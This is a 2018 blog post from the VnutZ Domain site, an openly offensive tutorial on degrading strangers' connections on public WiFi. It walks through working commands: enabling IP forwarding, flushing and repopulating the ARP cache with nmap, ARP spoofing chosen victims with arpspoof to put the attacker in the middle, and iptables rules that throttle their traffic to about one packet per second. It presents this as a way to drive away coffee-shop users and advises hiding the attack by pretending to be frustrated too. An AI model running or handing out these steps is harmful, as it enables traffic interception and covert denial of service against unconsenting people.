VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved

2018-03-16
Featured Article

How To Annoy Public WiFi Users

[index] [745 page views]

You're connected to a Public WiFi connection and realize how abysmally slow it's become. Is it the kids watching NetFlix? Is it the hipster live streaming his food? Or the pirate bit-torrenting in the corner? It really doesn't matter ... you're about to grind everyone else's connections to a near halt in the hopes they'll pack up and leave. NOTE: This can also be handy to get rid of people hogging all the comfy chairs or power outlets that are parked at your local coffee shop.

Now, a simple ARP spoofing operation can drive all their traffic to you where you can drop it leaving them with no data at all. But then it would be obvious you're the only user with a working connection. An added problem to a complete denial of service is the victims might complain to the host. This would draw attention to the access point working fine leading to the possible conclusion somebody is hacking. A better option would be to intercept everyone's traffic and then simply slow them down so they think the WiFi is working fine but that everyone else is hogging the bandwidth.

Needed Tools (all of this is native to Kali):

  • ARP Spoofer like arpspoof from dsniff
  • Network Scanner like nmap
  • Packet Filter with rate limiting controls like iptables

For any of this to work, your machine must forward received packets it receives so that it becomes a "man in the middle." You must enable IP packet forwarding with this simple command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now identify all the people present on the network to mess with. Now that firewalls are more prevalent these days, a simple port scan may not be enough to identify hosts since your query packets will be ignored. However, flushing the currently cached ARP table, doing a quick scan of the subnet, and then reviewing the freshly populated ARP table will always reveal all the nodes. The following example commands demonstrate flushing and scanning a common 192.168.1.* private subnet.

Flush the ARP cache using the ip utility:


root@EVILBOX:~# ip -s neighbor flush all

*** Round 1, deleting 16 entries ***
*** Flush is complete after 1 round ***

Conduct a quick scan of all the devices on the subnet to force populate the ARP table:


root@EVILBOX:~# nmap -sL 192.168.1.*

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-15 21:40 EDT
Nmap scan report for 192.168.1.0
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
....
Nmap scan report for 192.168.1.253
Nmap scan report for 192.168.1.254
Nmap scan report for 192.168.1.255

View the freshly populated ARP cache:


root@EVILBOX:~# arp -a
? (192.168.1.5) at dc:85:de:f6:a8:47 on [ether] on wlan0
? (192.168.1.4) at c8:69:cd:98:17:68 on [ether] on wlan0
_gateway (192.168.1.1) at 1c:1b:d:56:fc:f1 on [ether] on wlan0

At this point, you can begin picking victims out of the ARP cache results and start ARP spoofing in order to make all the traffic from the public WiFi spot's users get directed through your machine. The following command instructs arpspoof to forward bi-directional traffic between a target and a router.


root@EVILBOX:~# arpspoof -t 192.168.1.4 -r 192.168.1.1

Now all of the traffic from 192.168.1.4 to and from the router are getting forwarded through your machine. After flushing the FORWARD chain, set two quick iptables rules in order to slow down the target's perceived connection. You can tweak the allowed packets per second setting to identify a threshold where the target thinks the connection is working but is just abysmally slow. These rules will not impact your connection at all as the FORWARD table is only associated to packet forwarding and your connection utilizes the INPUT and OUTPUT chains.


root@EVILBOX:~# iptables -F FORWARD
root@EVILBOX:~# iptables -A FORWARD --match-limit \
                         --limit 1/sec --limit-burst 1 -j ACCEPT
root@EVILBOX:~# iptables -A FORWARD -j REJECT

Repeat the ARP spoofing steps for each targeted IP address. The iptables rules can be refined further with specific source and destination addresses to really tweak who gets throttled the most. You should be able to use manufacturer codes and visual product identification to isolate different users. Don't forget to look around frustrated so everyone else thinks your connection is lagging as well.



More site content that might interest you:

It's almost too easy to fabricate fake videos now.


Try your hand at fate and use the site's continuously updating statistical analysis of the MegaMillions and PowerBall lotteries to choose "smarter" number. Remember, you don't have to win the jackpot to win money from the lottery!


Tired of social media sites mining all your data? Try a private, auto-deleting message bulletin board.